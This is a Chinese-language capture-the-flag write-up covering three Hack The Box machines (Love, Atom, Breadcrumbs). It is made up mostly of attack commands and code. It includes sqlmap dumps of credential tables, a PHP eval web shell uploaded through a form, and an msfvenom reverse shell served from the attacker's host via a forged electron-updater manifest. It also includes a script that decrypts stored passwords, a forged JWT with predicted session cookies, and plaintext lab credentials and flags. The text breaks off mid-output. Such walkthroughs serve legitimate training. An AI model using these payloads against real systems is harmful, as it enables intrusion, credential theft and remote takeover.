The more knowledge you drink, the more thirsty you are.

love

端口扫描

nmap -sV -sT -Pn 10.10.10.239

Nmap scan report for 10.10.10.239
Host is up (0.87s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=6/9%Time=60C04557%P=x86_64-pc-linux-gnu%r(NUL
SF:L,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,4
SF:9,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,49,"E
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,49,"E\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20conn
SF:ect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,49,"E\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,49,
SF:"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20t
SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,49,"E\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20co
SF:nnect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,49,"E\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest,49,"E\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,49,"E\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,49,"E\0\0\x01\xffj\x0
SF:4Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(SIPOptions,49,"E\0\0\x01\xffj\x04Host
SF:\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20t
SF:his\x20MariaDB\x20server")%r(TerminalServer,49,"E\0\0\x01\xffj\x04Host\
SF:x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(NCP,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.
SF:16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaD
SF:B\x20server")%r(JavaRMI,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x
SF:20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20ser
SF:ver");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

nmap -A -p 443 10.10.10.239

Nmap scan report for 10.10.10.239
Host is up (0.75s latency).

PORT     STATE SERVICE  VERSION
443/tcp  open  ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (95%), Microsoft Windows Longhorn (95%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 1909 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows Server 2008 SP2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, www.love.htb

这里需要对SSL端口进行更加详细的扫描才能得到域名staging.love.htb
不使用域名访问443端口则会被403
5000端口则是直接403

漏洞利用

用域名访问443端口可以看到一个LFI漏洞
file协议读取即可

<?php
	#C:\xampp\htdocs\omrs\login.php
	session_start();
	include 'includes/conn.php';

	if(isset($_POST['login'])){
		$voter = $_POST['voter'];
		$password = $_POST['password'];

		$sql = "SELECT * FROM voters WHERE voters_id = '$voter'";
		$query = $conn->query($sql);

		if($query->num_rows < 1){
			$_SESSION['error'] = 'Cannot find voter with the ID';
		}
		else{
			$row = $query->fetch_assoc();
			if(password_verify($password, $row['password'])){
				$_SESSION['voter'] = $row['id'];
			}
			else{
				$_SESSION['error'] = 'Incorrect password';
			}
		}
		
	}
	else{
		$_SESSION['error'] = 'Input voter credentials first';
	}

	header('location: index.php');

?>

<?php
	#C:\xampp\htdocs\omrs\admin\includes\conn.php
	$conn = new mysqli('localhost', 'root', '', 'votesystem');

	if ($conn->connect_error) {
	    die("Connection failed: " . $conn->connect_error);
	}
	
?>

<?php
	#C:\xampp\htdocs\omrs\admin\login.php
	session_start();
	include 'includes/conn.php';

	if(isset($_POST['login'])){
		$username = $_POST['username'];
		$password = $_POST['password'];

		$sql = "SELECT * FROM admin WHERE username = '$username'";
		$query = $conn->query($sql);

		if($query->num_rows < 1){
			$_SESSION['error'] = 'Cannot find account with the username';
		}
		else{
			$row = $query->fetch_assoc();
			if(password_verify($password, $row['password'])){
				$_SESSION['admin'] = $row['id'];
			}
			else{
				$_SESSION['error'] = 'Incorrect password';
			}
		}
		
	}
	else{
		$_SESSION['error'] = 'Input admin credentials first';
	}

	header('location: index.php');

?>

<?php
	#C:\xampp\htdocs\omrs\admin\includes\conn.php
	$conn = new mysqli('localhost', 'root', '', 'votesystem');

	if ($conn->connect_error) {
	    die("Connection failed: " . $conn->connect_error);
	}
	
?>

明显地存在SQL注入

sqlmap -u "http://10.10.10.239/login.php" -data "voter=123&password=321&login=" --dbs
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] votesystem

sqlmap -u "http://10.10.10.239/admin/login.php" -data "username=123&password=321&login=" -D votesystem --tables
Database: votesystem
[5 tables]
+------------+
| admin      |
| candidates |
| positions  |
| voters     |
| votes      |
+------------+

sqlmap -u "http://10.10.10.239/admin/login.php" -data "username=123&password=321&login=" -D votesystem -T admin --columns
Database: votesystem
Table: admin
[7 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| created_on | date         |
| firstname  | varchar(50)  |
| id         | int(11)      |
| lastname   | varchar(50)  |
| password   | varchar(60)  |
| photo      | varchar(150) |
| username   | varchar(50)  |
+------------+--------------+

sqlmap -u "http://10.10.10.239/admin/login.php" -data "username=123&password=321&login=" -D votesystem -T admin -C username, password --dump
Database: votesystem
Table: admin
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC |
+----------+--------------------------------------------------------------+

sqlmap -u "http://10.10.10.239/admin/login.php" -data "username=123&password=321&login=" -D votesystem -T voters --columns
Database: votesystem
Table: voters
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| firstname | varchar(30)  |
| id        | int(11)      |
| lastname  | varchar(30)  |
| password  | varchar(60)  |
| photo     | varchar(150) |
| voters_id | varchar(15)  |
+-----------+--------------+


sqlmap -u "http://10.10.10.239/admin/login.php" -data "username=123&password=321&login=" -D votesystem -T voters -C voters_id, password --dump
+-----------+----------+
| voters_id | password |
+-----------+----------+
+-----------+----------+

然而这里Hash爆破速度过慢, Bcrypt的运算复杂程度远高于md5

~~看了眼别人WP~~
用443端口的功能访问本地5000得到登入凭证
admin:@LoveIsInTheAir!!!!
~~一直用渗透的常规思路打这台靶机, 没想到整这么一出~~
登入后台后上传Shel

POST /admin/voters_add.php HTTP/1.1

Host: 10.10.10.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7586397232801671174932942436
Content-Length: 696
Origin: http://10.10.10.239
Connection: close
Referer: http://10.10.10.239/admin/voters.php
Cookie: PHPSESSID=uofg65u57tbm4rp6jbn0359660
Upgrade-Insecure-Requests: 1

-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="firstname"

1
-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="lastname"

2
-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="password"

333
-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/jpeg

<?php eval($_POST["cmd"]);?>

-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="add"


-----------------------------7586397232801671174932942436--

蚁剑上传nc反弹shell

1 2	type c:\users\phoebe\desktop\user.txt fc8833cab6af6700441328fd2a4ecc04

权限提升

找到alwaysinstallelevated，即当注册表中的alwaysinstallelevated设置为1时，机器上运行任何的msi程序，均会以system权限执行，我们只需生成一个msi的木马程序即可提权。
https://zhuanlan.zhihu.com/p/375373404

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

msfvenom生成一个Shell即可

1 2	type c:\users\administrator\desktop\root.txt a0f54f7853efdefe4c8cef97186db4c8

msfvenom & nc

本着能不用MSF就不用了MSF的原则
没有使用meterpreter
但是发现有(staged)标识还是不能用nc直接接收Shell的
最后用windows/x64/shell/reverse_tcp

Atom

端口扫描

nmap -sV -sT -Pn 10.10.10.237

Nmap scan report for 10.10.10.237
Host is up (0.30s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open  msrpc        Microsoft Windows RPC
443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

漏洞利用

smbclient -L 10.10.10.237

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Software_Updates Disk      
SMB1 disabled -- no workgroup available

smbclient \\\\10.10.10.237\\software_updates

smb: \> dir
  .                                   D        0  Fri Jun 11 11:18:21 2021
  ..                                  D        0  Fri Jun 11 11:18:21 2021
  client1                             D        0  Fri Jun 11 11:18:21 2021
  client3                             D        0  Fri Jun 11 11:18:21 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 19:18:08 2021
		4413951 blocks of size 4096. 1381036 blocks available
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (6.3 KiloBytes/sec) (average 6.3 KiloBytes/sec)

Note taking application built with electron-builder which helps users in taking important
notes.

electron-builder可以在google上搜到一个RCE漏洞

https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

构造payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9996 -f exe > s\'hell.exe

cat latest.yml
version: 1.2.3
path: http://10.10.16.3:9999/s'hell.exe
sha512: pyfnrQs40RwrwKOWykgeZ0PKeSudGkN1UI/9j+PpxG4M42uY88j/hNAx7xWonk57X0GMdPIOma9FsfeBglTLMQ==

开启HTTP服务

1	python3 -m http.server 9999

将latest.yml上传至client*文件夹中

1 2	type c:\users\jason\desktop\user.txt 3eda0e1bce259d8ffd4c1994f84bfdea

权限提升

1 2	type c:\"program files"\redis\redis.windows.conf requirepass kidvscat_yes_kidvscat

redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat

keys *
1) "pk:ids:User"
2) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
3) "pk:ids:MetaDataClass"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"

get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

1
2
3

dir c:\users\jason\downloads\

d-----          4/2/2021   8:21 PM                PortableKanban

存在一个密码恢复的漏洞

#!/usr/bin/env python3
import json
import base64
from des import * # python3 -m pip install des
import sys

def decode(hash):
	hash = base64.b64decode(hash.encode('utf-8'))
	key = DesKey(b"7ly6UznJ")
	return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"))

得到kidvscat_admin_@123

evil-rm登入

1 2	type c:\users\administrator\desktop\root.txt 2b36cf6bd3cd95fc37d6e2f81e80163b

这提权部分实在是过于牵强了…

Breadcrumbs

端口扫描

nmap -sV -sT -Pn 10.10.10.228

Nmap scan report for 10.10.10.228
Host is up (0.38s latency).
Not shown: 992 closed ports
PORTSTATE    SERVICE   VERSION
22/tcp   openssh  OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   openhttp Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp  openmsrpcMicrosoft Windows RPC
139/tcp  opennetbios-ssn    Microsoft Windows netbios-ssn
443/tcp  openssl/http  Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp  openmicrosoft-ds?
1107/tcp filtered isoipsigport-2
3306/tcp openmysql?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=6/11%Time=60C2E951%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.3'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.3'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

路径扫描

dirb http://10.10.10.228/

---- Scanning URL: http://10.10.10.228/ ----
+ http://10.10.10.228/aux (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/books/
==> DIRECTORY: http://10.10.10.228/Books/
+ http://10.10.10.228/cgi-bin/ (CODE:403|SIZE:301)
+ http://10.10.10.228/com1 (CODE:403|SIZE:301)
+ http://10.10.10.228/com2 (CODE:403|SIZE:301)
+ http://10.10.10.228/com3 (CODE:403|SIZE:301)
+ http://10.10.10.228/con (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/css/
==> DIRECTORY: http://10.10.10.228/db/
==> DIRECTORY: http://10.10.10.228/DB/
+ http://10.10.10.228/examples (CODE:503|SIZE:401)
==> DIRECTORY: http://10.10.10.228/includes/
+ http://10.10.10.228/index.php (CODE:200|SIZE:2368)
==> DIRECTORY: http://10.10.10.228/js/
+ http://10.10.10.228/licenses (CODE:403|SIZE:420)
+ http://10.10.10.228/lpt1 (CODE:403|SIZE:301)
+ http://10.10.10.228/lpt2 (CODE:403|SIZE:301)
+ http://10.10.10.228/nul (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/php/
==> DIRECTORY: http://10.10.10.228/PHP/
+ http://10.10.10.228/phpmyadmin (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/portal/
+ http://10.10.10.228/prn (CODE:403|SIZE:301)
+ http://10.10.10.228/server-info (CODE:403|SIZE:420)
+ http://10.10.10.228/server-status (CODE:403|SIZE:420)
+ http://10.10.10.228/webalizer (CODE:403|SIZE:301)

---- Entering directory: http://10.10.10.228/portal/ ----
==> DIRECTORY: http://10.10.10.228/portal/assets/
+ http://10.10.10.228/portal/aux (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/com1 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/com2 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/com3 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/con (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/portal/db/
==> DIRECTORY: http://10.10.10.228/portal/DB/

==> DIRECTORY: http://10.10.10.228/portal/includes/
+ http://10.10.10.228/portal/index.php (CODE:302|SIZE:0)
+ http://10.10.10.228/portal/lpt1 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/lpt2 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/nul (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/portal/php/
==> DIRECTORY: http://10.10.10.228/portal/PHP/

+ http://10.10.10.228/portal/prn (CODE:403|SIZE:301)

==> DIRECTORY: http://10.10.10.228/portal/uploads/
==> DIRECTORY: http://10.10.10.228/portal/vendor/
-----------------
END_TIME: Sat Jun 12 13:42:20 2021
DOWNLOADED: 9224 - FOUND: 27

漏洞利用

访问路径/php/books.php

1
2
3

POST /includes/bookController.php HTTP/1.1

title=a&author=&method=0

1
2
3

POST /includes/bookController.php HTTP/1.1

book=book7.html&method=1

可以看到对/includes/bookController.php发起的两种POST请求
第二种请求存在LFI

1 2	Warning: file_get_contents(../books/): Failed to open stream: No such file or directory in C:\Users\www-data\Desktop\xampp\htdocs\includes\bookController.php on line 28 false

且Apache配置上存在目录遍历漏洞, 可以配合LFI进行文件读取

/portal/authController.php

<?php
require 'db/db.php';
require "cookie.php";
require "vendor/autoload.php";
use \Firebase\JWT\JWT;

$errors = array();
$username = "";
$userdata = array();
$valid = false;
$IP = $_SERVER['REMOTE_ADDR'];

//if user clicks on login
if($_SERVER['REQUEST_METHOD'] === "POST"){
    if($_POST['method'] == 0){
        $username = $_POST['username'];
        $password = $_POST['password'];
        
        $query = "SELECT username,position FROM users WHERE username=? LIMIT 1";
        $stmt = $con->prepare($query);
        $stmt->bind_param('s', $username);
        $stmt->execute();
        $result = $stmt->get_result();
        while ($row = $result->fetch_array(MYSQLI_ASSOC)){
            array_push($userdata, $row);
        }
        $userCount = $result->num_rows;
        $stmt->close();

        if($userCount > 0){
            $password = sha1($password);
            $passwordQuery = "SELECT * FROM users WHERE password=? AND username=? LIMIT 1";
            $stmt = $con->prepare($passwordQuery);
            $stmt->bind_param('ss', $password, $username);
            $stmt->execute();
            $result = $stmt->get_result();

            if($result->num_rows > 0){
                $valid = true;
            }
            $stmt->close();
        }

        if($valid){
            session_id(makesession($username));
            session_start();

            $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
            $data = array();

            $payload = array(
                "data" => array(
                    "username" => $username
            ));

            $jwt = JWT::encode($payload, $secret_key, 'HS256');
            
            setcookie("token", $jwt, time() + (86400 * 30), "/");

            $_SESSION['username'] = $username;
            $_SESSION['loggedIn'] = true;
            if($userdata[0]['position'] == ""){
                $_SESSION['role'] = "Awaiting approval";
            } 
            else{
                $_SESSION['role'] = $userdata[0]['position'];
            }
            
            header("Location: /portal");
        }

        else{
            $_SESSION['loggedIn'] = false;
            $errors['valid'] = "Username or Password incorrect";
        }
    }

    elseif($_POST['method'] == 1){
        $username=$_POST['username'];
        $password=$_POST['password'];
        $passwordConf=$_POST['passwordConf'];
        
        if(empty($username)){
            $errors['username'] = "Username Required";
        }
        if(strlen($username) < 4){
            $errors['username'] = "Username must be at least 4 characters long";
        }
        if(empty($password)){
            $errors['password'] = "Password Required"; 
        }
        if($password !== $passwordConf){
            $errors['passwordConf'] = "Passwords don't match!"; 
        }

        $userQuery = "SELECT * FROM users WHERE username=? LIMIT 1";
        $stmt = $con->prepare($userQuery);
        $stmt ->bind_param('s',$username);
        $stmt->execute();
        $result = $stmt->get_result();
        $userCount = $result->num_rows;
        $stmt->close();

        if($userCount > 0){
            $errors['username'] = "Username already exists";
        }

        if(count($errors) === 0){
            $password = sha1($password);
            $sql = "INSERT INTO users(username, password, age, position) VALUES (?,?, 0, '')";
            $stmt = $con->prepare($sql);
            $stmt ->bind_param('ss', $username, $password);

            if ($stmt->execute()){
                $user_id = $con->insert_id;
                header('Location: login.php');
            }
            else{
                $_SESSION['loggedIn'] = false;
                $errors['db_error']="Database error: failed to register";
            }
        }
    }
}

/portal/cookie.php

<?php
/**
 * @param string $username  Username requesting session cookie
 * 
 * @return string $session_cookie Returns the generated cookie
 * 
 * @devteam
 * Please DO NOT use default PHPSESSID; our security team says they are predictable.
 * CHANGE SECOND PART OF MD5 KEY EVERY WEEK
 * */
function makesession($username){
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_".$username[$seed]."(!528.\/9890";
    $session_cookie = $username.md5($key);

    return $session_cookie;
}

/portal/includes/fileController.php

<?php
$ret = "";
require "../vendor/autoload.php";
use \Firebase\JWT\JWT;
session_start();

function validate(){
    $ret = false;
    $jwt = $_COOKIE['token'];

    $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
    $ret = JWT::decode($jwt, $secret_key, array('HS256'));   
    return $ret;
}

if($_SERVER['REQUEST_METHOD'] === "POST"){
    $admins = array("paul");
    $user = validate()->data->username;
    if(in_array($user, $admins) && $_SESSION['username'] == "paul"){
        error_reporting(E_ALL & ~E_NOTICE);
        $uploads_dir = '../uploads';
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_POST['task'];

        if(move_uploaded_file($tmp_name, "$uploads_dir/$name")){
            $ret = "Success. Have a great weekend!";
        }     
        else{
            $ret = "Missing file or title :(" ;
        }
    }
    else{
        $ret = "Insufficient privileges. Contact admin or developer to upload code. Note: If you recently registered, please wait for one of our admins to approve it.";
    }

    echo $ret;
}

/portal/php/files.php

<?php
session_start();
$LOGGED_IN = false;
if($_SESSION['username'] !== "paul"){
    header("Location: ../index.php");
}
if(isset($_SESSION['loggedIn'])){
    $LOGGED_IN = true;
    require '../db/db.php';
}
else{
    header("Location: ../auth/login.php");
    die();
}
?>

而且files.php存在一个上传功能
以理一下攻击链

fileController.php上传文件
要求得到paul的身份
生成PHPSESSID和JWT

对于JWT
我们已经得到了签名密钥

#!/usr/bin/env python2
import jwt
token_dict = {"data":{"username":"paul"}}
headers = {"typ":"JWT", "alg":"HS256"}
jwt_token = jwt.encode(token_dict, "6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e", algorithm="HS256", headers=headers).decode('ascii')
print(jwt_token)

1	eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.4mJguG8tRd2z_feWJpmr_J3AdMeDPvW7GCK7cW7o0AI

对于PHPSESSID

<?php
    $num = array(0, 1, 2, 3);
    $username = "paul";
    foreach($num as $a)
    {
        $key = "s4lTy_stR1nG_".$username[$a]."(!528./9890";
        $session_cookie = $username.md5($key);
        echo $session_cookie."\n";
    }
?>

paula2a6a014d3bee04d7df8d5837d62e8c5
paul61ff9d4aaefe6bdf45681678ba89ff9d
paul8c8808867b53c49777fe5559164708c3
paul47200b180ccd6835d25d034eeb6e6390

最后得到的Cookie为

1	Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.4mJguG8tRd2z_feWJpmr_J3AdMeDPvW7GCK7cW7o0AI; PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390

上传ZIP时修改文件名和文件内容即可GetShell

权限提升

1	type C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData\juliette.json

{
	"pizza" : "margherita",
	"size" : "large",	
	"drink" : "water",
	"card" : "VISA",
	"PIN" : "9890",
	"alternate" : {
		"username" : "juliette",
		"password" : "jUli901./())!",
	}
}

使用凭证juliette:jUli901./())!登入ssh服务

type C:\Users\juliette\Desktop\user.txt
c5d9d568c5fc21e0dc0c5819d16aad9f

type C:\Users\juliette\Desktop\todo.html
<html>
<style>
html{
background:black;
color:orange;
}
table,th,td{
border:1px solid orange;
padding:1em;
border-collapse:collapse;
}
</style>
<table>
        <tr>
            <th>Task</th>
            <th>Status</th>
            <th>Reason</th>
        </tr>
        <tr>
            <td>Configure firewall for port 22 and 445</td>
            <td>Not started</td>
            <td>Unauthorized access might be possible</td>
        </tr>
        <tr>
            <td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>   
            <td>In progress</td>
            <td>It stores passwords in plain text</td>
        </tr>
        <tr>
            <td>Add new features to password manager</td>
            <td>Not started</td>
            <td>To get promoted, hopefully lol</td>
        </tr>
</table>

</html>

寻找密码存储文件

dir C:\Users\juliette\Documents

11/29/2020  04:10 AM             4,096 plum.sqlite
01/15/2021  05:10 PM            32,768 plum.sqlite-shm
01/15/2021  05:10 PM           329,632 plum.sqlite-wal

复制到本地使用sqlite访问

sqlite3 plum.sqlite 
sqlite> .tables
Media           Stroke          SyncState       User          
Note            StrokeMetadata  UpgradedNote  
sqlite> select * from Note;
\id=48c70e58-fcf9-475a-aea4-24ce19a9f9ec juliette: jUli901./())!
\id=fc0d8d70-055d-4870-a5de-d76943a68ea2 development: fN3)sN5Ee@g
\id=48924119-7212-4b01-9e0f-ae6d678d49b2 administrator: [MOVED]|ManagedPosition=|1|0||Yellow|0|||||||0c32c3d8-7c60-48ae-939e-798df198cfe7|8e814e57-9d28-4288-961c-31c806338c5b|637423162765765332||637423163995607122

得到凭证development:fN3)sN5Ee@g
登入ssh服务

1
2
3

dir c:\Development

11/29/2020  04:11 AM            18,312 Krypter_Linux

IDA反编译

int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rbx
  __int64 v4; // rax
  char v6[44]; // [rsp+10h] [rbp-50h] BYREF
  int v7; // [rsp+3Ch] [rbp-24h]
  __int64 v8; // [rsp+40h] [rbp-20h]
  int i; // [rsp+48h] [rbp-18h]
  int v10; // [rsp+4Ch] [rbp-14h]

  std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(v6, argv, envp);
  v8 = curl_easy_init();
  puts(
    "Krypter V1.2\n"
    "\n"
    "New project by Juliette.\n"
    "New features added weekly!\n"
    "What to expect next update:\n"
    "\t- Windows version with GUI support\n"
    "\t- Get password from cloud and AUTOMATICALLY decrypt!\n"
    "***\n");
  if ( argc == 2 )
  {
    v10 = 0;
    for ( i = 0; ; ++i )
    {
      v3 = i;
      if ( v3 >= strlen(argv[1]) )
        break;
      v10 += argv[1][i];
    }
    if ( v10 == 1601 )
    {
      if ( v8 )
      {
        puts("Requesting decryption key from cloud...\nAccount: Administrator");
        curl_easy_setopt(v8, 10002LL, (__int64)"http://passmanager.htb:1234/index.php");
        curl_easy_setopt(v8, 10015LL, (__int64)"method=select&username=administrator&table=passwords");
        curl_easy_setopt(v8, 20011LL, (__int64)WriteCallback);
        curl_easy_setopt(v8, 10001LL, (__int64)v6);
        v7 = curl_easy_perform(v8);
        curl_easy_cleanup(v8);
        puts("Server response:\n\n");
        v4 = std::operator<<<char>(&std::cout, v6);
        std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
      }
    }
    else
    {
      puts("Incorrect master key");
    }
  }
  else
  {
    puts("No key supplied.\nUSAGE:\n\nKrypter <key>");
  }
  std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(v6);
  return 0;
}

1
2
3

netstat -ant

  TCP    127.0.0.1:1234         0.0.0.0:0              LISTENING       InHost

用程序中的URL访问

curl "http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords"

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
